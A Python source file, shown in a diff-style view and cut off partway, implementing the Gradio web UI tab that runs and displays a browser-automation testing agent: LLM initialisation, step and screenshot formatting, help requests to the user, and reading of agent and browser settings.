|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Use Agent Tab
|
| 3 |
+
================================================================
|
| 4 |
+
|
| 5 |
+
UI components for running and managing browser automation tasks.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import json
|
| 14 |
+
import logging
|
| 15 |
+
import os
|
| 16 |
+
import uuid
|
| 17 |
+
from typing import Any, AsyncGenerator, Dict, Optional
|
| 18 |
+
|
| 19 |
+
import gradio as gr
|
| 20 |
+
|
| 21 |
+
# from browser_use.agent.service import Agent
|
| 22 |
+
from browser_use.agent.views import (
|
| 23 |
+
AgentHistoryList,
|
| 24 |
+
AgentOutput,
|
| 25 |
+
)
|
| 26 |
+
from browser_use.browser.browser import BrowserConfig
|
| 27 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 28 |
+
from browser_use.browser.views import BrowserState
|
| 29 |
+
from gradio.components import Component
|
| 30 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 31 |
+
|
| 32 |
+
from src.agent.browser_use.browser_use_agent import BrowserUseAgent
|
| 33 |
+
from src.browser.custom_browser import CustomBrowser
|
| 34 |
+
from src.controller.custom_controller import CustomController
|
| 35 |
+
from src.utils import llm_provider
|
| 36 |
+
from src.webui.webui_manager import WebuiManager
|
| 37 |
+
|
| 38 |
+
logger = logging.getLogger(__name__)
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
# --- Helper Functions --- (Defined at module level)
|
| 42 |
+
|
| 43 |
+
|
| 44 |
+
async def _initialize_llm(
|
| 45 |
+
provider: Optional[str],
|
| 46 |
+
model_name: Optional[str],
|
| 47 |
+
temperature: float,
|
| 48 |
+
base_url: Optional[str],
|
| 49 |
+
api_key: Optional[str],
|
| 50 |
+
num_ctx: Optional[int] = None,
|
| 51 |
+
) -> Optional[BaseChatModel]:
|
| 52 |
+
"""Initializes the LLM based on settings. Returns None if provider/model is missing."""
|
| 53 |
+
if not provider or not model_name:
|
| 54 |
+
logger.info("LLM Provider or Model Name not specified, LLM will be None.")
|
| 55 |
+
return None
|
| 56 |
+
try:
|
| 57 |
+
# Use your actual LLM provider logic here
|
| 58 |
+
logger.info(
|
| 59 |
+
f"Initializing LLM: Provider={provider}, Model={model_name}, Temp={temperature}"
|
| 60 |
+
)
|
| 61 |
+
# Example using a placeholder function
|
| 62 |
+
llm = llm_provider.get_llm_model(
|
| 63 |
+
provider=provider,
|
| 64 |
+
model_name=model_name,
|
| 65 |
+
temperature=temperature,
|
| 66 |
+
base_url=base_url or None,
|
| 67 |
+
api_key=api_key or None,
|
| 68 |
+
# Add other relevant params like num_ctx for ollama
|
| 69 |
+
num_ctx=num_ctx if provider == "ollama" else None,
|
| 70 |
+
)
|
| 71 |
+
return llm
|
| 72 |
+
except Exception as e:
|
| 73 |
+
logger.error(f"Failed to initialize LLM: {e}", exc_info=True)
|
| 74 |
+
gr.Warning(
|
| 75 |
+
f"Failed to initialize LLM '{model_name}' for provider '{provider}'. Please check settings. Error: {e}"
|
| 76 |
+
)
|
| 77 |
+
return None
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
def _get_config_value(
|
| 81 |
+
webui_manager: WebuiManager,
|
| 82 |
+
comp_dict: Dict[gr.components.Component, Any],
|
| 83 |
+
comp_id_suffix: str,
|
| 84 |
+
default: Any = None,
|
| 85 |
+
) -> Any:
|
| 86 |
+
"""Safely get value from component dictionary using its ID suffix relative to the tab."""
|
| 87 |
+
# Assumes component ID format is "tab_name.comp_name"
|
| 88 |
+
tab_name = "browser_use_agent" # Hardcode or derive if needed
|
| 89 |
+
comp_id = f"{tab_name}.{comp_id_suffix}"
|
| 90 |
+
# Need to find the component object first using the ID from the manager
|
| 91 |
+
try:
|
| 92 |
+
comp = webui_manager.get_component_by_id(comp_id)
|
| 93 |
+
return comp_dict.get(comp, default)
|
| 94 |
+
except KeyError:
|
| 95 |
+
# Try accessing settings tabs as well
|
| 96 |
+
for prefix in ["agent_settings", "browser_settings"]:
|
| 97 |
+
try:
|
| 98 |
+
comp_id = f"{prefix}.{comp_id_suffix}"
|
| 99 |
+
comp = webui_manager.get_component_by_id(comp_id)
|
| 100 |
+
return comp_dict.get(comp, default)
|
| 101 |
+
except KeyError:
|
| 102 |
+
continue
|
| 103 |
+
logger.warning(
|
| 104 |
+
f"Component with suffix '{comp_id_suffix}' not found in manager for value lookup."
|
| 105 |
+
)
|
| 106 |
+
return default
|
| 107 |
+
|
| 108 |
+
|
| 109 |
+
def _format_agent_output(model_output: AgentOutput) -> str:
|
| 110 |
+
"""Formats AgentOutput for display in the chatbot using JSON."""
|
| 111 |
+
content = ""
|
| 112 |
+
if model_output:
|
| 113 |
+
try:
|
| 114 |
+
# Directly use model_dump if actions and current_state are Pydantic models
|
| 115 |
+
action_dump = [
|
| 116 |
+
action.model_dump(exclude_none=True) for action in model_output.action
|
| 117 |
+
]
|
| 118 |
+
|
| 119 |
+
state_dump = model_output.current_state.model_dump(exclude_none=True)
|
| 120 |
+
model_output_dump = {
|
| 121 |
+
"current_state": state_dump,
|
| 122 |
+
"action": action_dump,
|
| 123 |
+
}
|
| 124 |
+
# Dump to JSON string with indentation
|
| 125 |
+
json_string = json.dumps(model_output_dump, indent=4, ensure_ascii=False)
|
| 126 |
+
# Wrap in <pre><code> for proper display in HTML
|
| 127 |
+
content = f"<pre><code class='language-json'>{json_string}</code></pre>"
|
| 128 |
+
|
| 129 |
+
except AttributeError as ae:
|
| 130 |
+
logger.error(
|
| 131 |
+
f"AttributeError during model dump: {ae}. Check if 'action' or 'current_state' or their items support 'model_dump'."
|
| 132 |
+
)
|
| 133 |
+
content = f"<pre><code>Error: Could not format agent output (AttributeError: {ae}).\nRaw output: {str(model_output)}</code></pre>"
|
| 134 |
+
except Exception as e:
|
| 135 |
+
logger.error(f"Error formatting agent output: {e}", exc_info=True)
|
| 136 |
+
# Fallback to simple string representation on error
|
| 137 |
+
content = f"<pre><code>Error formatting agent output.\nRaw output:\n{str(model_output)}</code></pre>"
|
| 138 |
+
|
| 139 |
+
return content.strip()
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
# --- Updated Callback Implementation ---
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
async def _handle_new_step(
|
| 146 |
+
webui_manager: WebuiManager, state: BrowserState, output: AgentOutput, step_num: int
|
| 147 |
+
):
|
| 148 |
+
"""Callback for each step taken by the agent, including screenshot display."""
|
| 149 |
+
|
| 150 |
+
# Use the correct chat history attribute name from the user's code
|
| 151 |
+
if not hasattr(webui_manager, "bu_chat_history"):
|
| 152 |
+
logger.error(
|
| 153 |
+
"Attribute 'bu_chat_history' not found in webui_manager! Cannot add chat message."
|
| 154 |
+
)
|
| 155 |
+
# Initialize it maybe? Or raise an error? For now, log and potentially skip chat update.
|
| 156 |
+
webui_manager.bu_chat_history = [] # Initialize if missing (consider if this is the right place)
|
| 157 |
+
# return # Or stop if this is critical
|
| 158 |
+
step_num -= 1
|
| 159 |
+
logger.info(f"Step {step_num} completed.")
|
| 160 |
+
|
| 161 |
+
# --- Screenshot Handling ---
|
| 162 |
+
screenshot_html = ""
|
| 163 |
+
# Ensure state.screenshot exists and is not empty before proceeding
|
| 164 |
+
# Use getattr for safer access
|
| 165 |
+
screenshot_data = getattr(state, "screenshot", None)
|
| 166 |
+
if screenshot_data:
|
| 167 |
+
try:
|
| 168 |
+
# Basic validation: check if it looks like base64
|
| 169 |
+
if (
|
| 170 |
+
isinstance(screenshot_data, str) and len(screenshot_data) > 100
|
| 171 |
+
): # Arbitrary length check
|
| 172 |
+
# *** UPDATED STYLE: Removed centering, adjusted width ***
|
| 173 |
+
img_tag = f'<img src="data:image/jpeg;base64,{screenshot_data}" alt="Step {step_num} Screenshot" style="max-width: 800px; max-height: 600px; object-fit:contain;" />'
|
| 174 |
+
screenshot_html = (
|
| 175 |
+
img_tag + "<br/>"
|
| 176 |
+
) # Use <br/> for line break after inline-block image
|
| 177 |
+
else:
|
| 178 |
+
logger.warning(
|
| 179 |
+
f"Screenshot for step {step_num} seems invalid (type: {type(screenshot_data)}, len: {len(screenshot_data) if isinstance(screenshot_data, str) else 'N/A'})."
|
| 180 |
+
)
|
| 181 |
+
screenshot_html = "**[Invalid screenshot data]**<br/>"
|
| 182 |
+
|
| 183 |
+
except Exception as e:
|
| 184 |
+
logger.error(
|
| 185 |
+
f"Error processing or formatting screenshot for step {step_num}: {e}",
|
| 186 |
+
exc_info=True,
|
| 187 |
+
)
|
| 188 |
+
screenshot_html = "**[Error displaying screenshot]**<br/>"
|
| 189 |
+
else:
|
| 190 |
+
logger.debug(f"No screenshot available for step {step_num}.")
|
| 191 |
+
|
| 192 |
+
# --- Format Agent Output ---
|
| 193 |
+
formatted_output = _format_agent_output(output) # Use the updated function
|
| 194 |
+
|
| 195 |
+
# --- Combine and Append to Chat ---
|
| 196 |
+
step_header = f"--- **Step {step_num}** ---"
|
| 197 |
+
# Combine header, image (with line break), and JSON block
|
| 198 |
+
final_content = step_header + "<br/>" + screenshot_html + formatted_output
|
| 199 |
+
|
| 200 |
+
chat_message = {
|
| 201 |
+
"role": "assistant",
|
| 202 |
+
"content": final_content.strip(), # Remove leading/trailing whitespace
|
| 203 |
+
}
|
| 204 |
+
|
| 205 |
+
# Append to the correct chat history list
|
| 206 |
+
webui_manager.bu_chat_history.append(chat_message)
|
| 207 |
+
|
| 208 |
+
await asyncio.sleep(0.05)
|
| 209 |
+
|
| 210 |
+
|
| 211 |
+
def _handle_done(webui_manager: WebuiManager, history: AgentHistoryList):
|
| 212 |
+
"""Callback when the agent finishes the task (success or failure)."""
|
| 213 |
+
logger.info(
|
| 214 |
+
f"Agent task finished. Duration: {history.total_duration_seconds():.2f}s, Tokens: {history.total_input_tokens()}"
|
| 215 |
+
)
|
| 216 |
+
final_summary = "**Task Completed**\n"
|
| 217 |
+
final_summary += f"- Duration: {history.total_duration_seconds():.2f} seconds\n"
|
| 218 |
+
final_summary += f"- Total Input Tokens: {history.total_input_tokens()}\n" # Or total tokens if available
|
| 219 |
+
|
| 220 |
+
final_result = history.final_result()
|
| 221 |
+
if final_result:
|
| 222 |
+
final_summary += f"- Final Result: {final_result}\n"
|
| 223 |
+
|
| 224 |
+
errors = history.errors()
|
| 225 |
+
if errors and any(errors):
|
| 226 |
+
final_summary += f"- **Errors:**\n```\n{errors}\n```\n"
|
| 227 |
+
else:
|
| 228 |
+
final_summary += "- Status: Success\n"
|
| 229 |
+
|
| 230 |
+
webui_manager.bu_chat_history.append(
|
| 231 |
+
{"role": "assistant", "content": final_summary}
|
| 232 |
+
)
|
| 233 |
+
|
| 234 |
+
|
| 235 |
+
async def _ask_assistant_callback(
|
| 236 |
+
webui_manager: WebuiManager, query: str, browser_context: BrowserContext
|
| 237 |
+
) -> Dict[str, Any]:
|
| 238 |
+
"""Callback triggered by the agent's ask_for_assistant action."""
|
| 239 |
+
logger.info("Agent requires assistance. Waiting for user input.")
|
| 240 |
+
|
| 241 |
+
if not hasattr(webui_manager, "_chat_history"):
|
| 242 |
+
logger.error("Chat history not found in webui_manager during ask_assistant!")
|
| 243 |
+
return {"response": "Internal Error: Cannot display help request."}
|
| 244 |
+
|
| 245 |
+
webui_manager.bu_chat_history.append(
|
| 246 |
+
{
|
| 247 |
+
"role": "assistant",
|
| 248 |
+
"content": f"**Need Help:** {query}\nPlease provide information or perform the required action in the browser, then type your response/confirmation below and click 'Submit Response'.",
|
| 249 |
+
}
|
| 250 |
+
)
|
| 251 |
+
|
| 252 |
+
# Use state stored in webui_manager
|
| 253 |
+
webui_manager.bu_response_event = asyncio.Event()
|
| 254 |
+
webui_manager.bu_user_help_response = None # Reset previous response
|
| 255 |
+
|
| 256 |
+
try:
|
| 257 |
+
logger.info("Waiting for user response event...")
|
| 258 |
+
await asyncio.wait_for(
|
| 259 |
+
webui_manager.bu_response_event.wait(), timeout=3600.0
|
| 260 |
+
) # Long timeout
|
| 261 |
+
logger.info("User response event received.")
|
| 262 |
+
except asyncio.TimeoutError:
|
| 263 |
+
logger.warning("Timeout waiting for user assistance.")
|
| 264 |
+
webui_manager.bu_chat_history.append(
|
| 265 |
+
{
|
| 266 |
+
"role": "assistant",
|
| 267 |
+
"content": "**Timeout:** No response received. Trying to proceed.",
|
| 268 |
+
}
|
| 269 |
+
)
|
| 270 |
+
webui_manager.bu_response_event = None # Clear the event
|
| 271 |
+
return {"response": "Timeout: User did not respond."} # Inform the agent
|
| 272 |
+
|
| 273 |
+
response = webui_manager.bu_user_help_response
|
| 274 |
+
webui_manager.bu_chat_history.append(
|
| 275 |
+
{"role": "user", "content": response}
|
| 276 |
+
) # Show user response in chat
|
| 277 |
+
webui_manager.bu_response_event = (
|
| 278 |
+
None # Clear the event for the next potential request
|
| 279 |
+
)
|
| 280 |
+
return {"response": response}
|
| 281 |
+
|
| 282 |
+
|
| 283 |
+
# --- Core Agent Execution Logic --- (Needs access to webui_manager)
|
| 284 |
+
|
| 285 |
+
|
| 286 |
+
async def run_agent_task(
|
| 287 |
+
webui_manager: WebuiManager, components: Dict[gr.components.Component, Any]
|
| 288 |
+
) -> AsyncGenerator[Dict[gr.components.Component, Any], None]:
|
| 289 |
+
"""Handles the entire lifecycle of initializing and running the agent."""
|
| 290 |
+
|
| 291 |
+
# --- Get Components ---
|
| 292 |
+
# Need handles to specific UI components to update them
|
| 293 |
+
user_input_comp = webui_manager.get_component_by_id("browser_use_agent.user_input")
|
| 294 |
+
run_button_comp = webui_manager.get_component_by_id("browser_use_agent.run_button")
|
| 295 |
+
stop_button_comp = webui_manager.get_component_by_id(
|
| 296 |
+
"browser_use_agent.stop_button"
|
| 297 |
+
)
|
| 298 |
+
pause_resume_button_comp = webui_manager.get_component_by_id(
|
| 299 |
+
"browser_use_agent.pause_resume_button"
|
| 300 |
+
)
|
| 301 |
+
clear_button_comp = webui_manager.get_component_by_id(
|
| 302 |
+
"browser_use_agent.clear_button"
|
| 303 |
+
)
|
| 304 |
+
chatbot_comp = webui_manager.get_component_by_id("browser_use_agent.chatbot")
|
| 305 |
+
history_file_comp = webui_manager.get_component_by_id(
|
| 306 |
+
"browser_use_agent.agent_history_file"
|
| 307 |
+
)
|
| 308 |
+
gif_comp = webui_manager.get_component_by_id("browser_use_agent.recording_gif")
|
| 309 |
+
browser_view_comp = webui_manager.get_component_by_id(
|
| 310 |
+
"browser_use_agent.browser_view"
|
| 311 |
+
)
|
| 312 |
+
|
| 313 |
+
# --- 1. Get Task and Initial UI Update ---
|
| 314 |
+
task = components.get(user_input_comp, "").strip()
|
| 315 |
+
if not task:
|
| 316 |
+
gr.Warning("Please enter a task.")
|
| 317 |
+
yield {run_button_comp: gr.update(interactive=True)}
|
| 318 |
+
return
|
| 319 |
+
|
| 320 |
+
# Set running state indirectly via _current_task
|
| 321 |
+
webui_manager.bu_chat_history.append({"role": "user", "content": task})
|
| 322 |
+
|
| 323 |
+
yield {
|
| 324 |
+
user_input_comp: gr.Textbox(
|
| 325 |
+
value="", interactive=False, placeholder="Agent is running..."
|
| 326 |
+
),
|
| 327 |
+
run_button_comp: gr.Button(value="⏳ Running...", interactive=False),
|
| 328 |
+
stop_button_comp: gr.Button(interactive=True),
|
| 329 |
+
pause_resume_button_comp: gr.Button(value="⏸️ Pause", interactive=True),
|
| 330 |
+
clear_button_comp: gr.Button(interactive=False),
|
| 331 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 332 |
+
history_file_comp: gr.update(value=None),
|
| 333 |
+
gif_comp: gr.update(value=None),
|
| 334 |
+
}
|
| 335 |
+
|
| 336 |
+
# --- Agent Settings ---
|
| 337 |
+
# Access settings values via components dict, getting IDs from webui_manager
|
| 338 |
+
def get_setting(key, default=None):
|
| 339 |
+
comp = webui_manager.id_to_component.get(f"agent_settings.{key}")
|
| 340 |
+
return components.get(comp, default) if comp else default
|
| 341 |
+
|
| 342 |
+
override_system_prompt = get_setting("override_system_prompt") or None
|
| 343 |
+
extend_system_prompt = get_setting("extend_system_prompt") or None
|
| 344 |
+
llm_provider_name = get_setting(
|
| 345 |
+
"llm_provider", None
|
| 346 |
+
) # Default to None if not found
|
| 347 |
+
llm_model_name = get_setting("llm_model_name", None)
|
| 348 |
+
llm_temperature = get_setting("llm_temperature", 0.6)
|
| 349 |
+
use_vision = get_setting("use_vision", True)
|
| 350 |
+
ollama_num_ctx = get_setting("ollama_num_ctx", 16000)
|
| 351 |
+
llm_base_url = get_setting("llm_base_url") or None
|
| 352 |
+
llm_api_key = get_setting("llm_api_key") or None
|
| 353 |
+
max_steps = get_setting("max_steps", 100)
|
| 354 |
+
max_actions = get_setting("max_actions", 10)
|
| 355 |
+
max_input_tokens = get_setting("max_input_tokens", 128000)
|
| 356 |
+
tool_calling_str = get_setting("tool_calling_method", "auto")
|
| 357 |
+
tool_calling_method = tool_calling_str if tool_calling_str != "None" else None
|
| 358 |
+
mcp_server_config_comp = webui_manager.id_to_component.get(
|
| 359 |
+
"agent_settings.mcp_server_config"
|
| 360 |
+
)
|
| 361 |
+
mcp_server_config_str = (
|
| 362 |
+
components.get(mcp_server_config_comp) if mcp_server_config_comp else None
|
| 363 |
+
)
|
| 364 |
+
mcp_server_config = (
|
| 365 |
+
json.loads(mcp_server_config_str) if mcp_server_config_str else None
|
| 366 |
+
)
|
| 367 |
+
|
| 368 |
+
# Planner LLM Settings (Optional)
|
| 369 |
+
planner_llm_provider_name = get_setting("planner_llm_provider") or None
|
| 370 |
+
planner_llm = None
|
| 371 |
+
planner_use_vision = False
|
| 372 |
+
if planner_llm_provider_name:
|
| 373 |
+
planner_llm_model_name = get_setting("planner_llm_model_name")
|
| 374 |
+
planner_llm_temperature = get_setting("planner_llm_temperature", 0.6)
|
| 375 |
+
planner_ollama_num_ctx = get_setting("planner_ollama_num_ctx", 16000)
|
| 376 |
+
planner_llm_base_url = get_setting("planner_llm_base_url") or None
|
| 377 |
+
planner_llm_api_key = get_setting("planner_llm_api_key") or None
|
| 378 |
+
planner_use_vision = get_setting("planner_use_vision", False)
|
| 379 |
+
|
| 380 |
+
planner_llm = await _initialize_llm(
|
| 381 |
+
planner_llm_provider_name,
|
| 382 |
+
planner_llm_model_name,
|
| 383 |
+
planner_llm_temperature,
|
| 384 |
+
planner_llm_base_url,
|
| 385 |
+
planner_llm_api_key,
|
| 386 |
+
planner_ollama_num_ctx if planner_llm_provider_name == "ollama" else None,
|
| 387 |
+
)
|
| 388 |
+
|
| 389 |
+
# --- Browser Settings ---
|
| 390 |
+
def get_browser_setting(key, default=None):
|
| 391 |
+
comp = webui_manager.id_to_component.get(f"browser_settings.{key}")
|
| 392 |
+
return components.get(comp, default) if comp else default
|
| 393 |
+
|
| 394 |
+
browser_binary_path = get_browser_setting("browser_binary_path") or None
|
| 395 |
+
browser_user_data_dir = get_browser_setting("browser_user_data_dir") or None
|
| 396 |
+
use_own_browser = get_browser_setting(
|
| 397 |
+
"use_own_browser", False
|
| 398 |
+
) # Logic handled by CDP/WSS presence
|
| 399 |
+
keep_browser_open = get_browser_setting("keep_browser_open", False)
|
| 400 |
+
headless = get_browser_setting("headless", False)
|
| 401 |
+
disable_security = get_browser_setting("disable_security", False)
|
| 402 |
+
window_w = int(get_browser_setting("window_w", 1280))
|
| 403 |
+
window_h = int(get_browser_setting("window_h", 1100))
|
| 404 |
+
cdp_url = get_browser_setting("cdp_url") or None
|
| 405 |
+
wss_url = get_browser_setting("wss_url") or None
|
| 406 |
+
save_recording_path = get_browser_setting("save_recording_path") or None
|
| 407 |
+
save_trace_path = get_browser_setting("save_trace_path") or None
|
| 408 |
+
save_agent_history_path = get_browser_setting(
|
| 409 |
+
"save_agent_history_path", "./tmp/agent_history"
|
| 410 |
+
)
|
| 411 |
+
save_download_path = get_browser_setting("save_download_path", "./tmp/downloads")
|
| 412 |
+
|
| 413 |
+
stream_vw = 70
|
| 414 |
+
stream_vh = int(70 * window_h // window_w)
|
| 415 |
+
|
| 416 |
+
os.makedirs(save_agent_history_path, exist_ok=True)
|
| 417 |
+
if save_recording_path:
|
| 418 |
+
os.makedirs(save_recording_path, exist_ok=True)
|
| 419 |
+
if save_trace_path:
|
| 420 |
+
os.makedirs(save_trace_path, exist_ok=True)
|
| 421 |
+
if save_download_path:
|
| 422 |
+
os.makedirs(save_download_path, exist_ok=True)
|
| 423 |
+
|
| 424 |
+
# --- 2. Initialize LLM ---
